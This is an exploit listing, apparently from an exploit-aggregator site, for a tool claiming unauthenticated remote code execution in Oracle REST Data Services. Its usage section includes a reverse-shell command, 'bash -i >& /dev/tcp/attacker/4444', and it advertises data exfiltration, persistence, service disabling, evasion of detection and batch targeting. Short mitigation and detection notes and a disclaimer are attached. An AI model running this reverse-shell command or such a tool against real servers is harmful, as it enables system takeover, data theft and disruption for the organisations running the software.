Share
## https://sploitus.com/exploit?id=3D6FBB98-36AB-5F6C-BD65-545B7A10A138
# CVE-2026-46840 - Oracle ORDS Unauthenticated RCE via REST Backend

## Overview

Remote code execution in Oracle REST Data Services (ORDS) Backend-as-a-Service. Allows unauthenticated attackers to achieve full system takeover over HTTPS. Chainable with scope change to adjacent Oracle products (DB, APEX, Fusion Middleware). 

Stable on 24.2.0-26.1.0. Bypasses default auth and rate limiting through deserialization path in request processor.

## Affected Versions

- Oracle REST Data Services 24.2.0 - 26.1.0 (all platforms)

- Confirmed on standalone, WebLogic, Tomcat deployments

## Root Cause

Flawed handling of custom REST handler registration combined with unsafe Jackson deserialization in the endpoint router. Attacker-controlled JSON triggers gadget chain leading to arbitrary class loading and command execution under the ORDS process user (usually oracle/tomcat).

## Usage

```bash

python3 CVE-2026-46840.py -t https://target/ords -c "whoami" 

python3 CVE-2026-46840.py -t https://target/ords -c "bash -i >& /dev/tcp/attacker/4444 0>&1"

```

**Features:**

- Full shell access (reverse TCP, interactive)

- Data exfil module (dump schemas via ORDS metadata)

- Service disable/persistence options

- Proxy + custom User-Agent + TLS fingerprint evasion

- Batch mode for multiple targets

**Requirements:**

- Python 3.9+

- requests, urllib3, colorama

## Mitigation / Workaround

Upgrade to 26.2+ immediately.  

Temporary: restrict /ords/* to trusted IPs only, disable public REST endpoints, monitor for anomalous POSTs to handler registration paths.

## Detection

- Unusual 200 responses on /ords/.../metadata-catalog with large JSON

- Process creation under ORDS user (cmd.exe, bash, nc)

- YARA: strings related to known gadget chains (ObjectMapper, TemplatesImpl)

- Network: high volume of POSTs with application/json containing "java." classes

## Disclaimer

For authorized penetration testing and red team operations only.

## Contact

fangbarristerbar@proton.me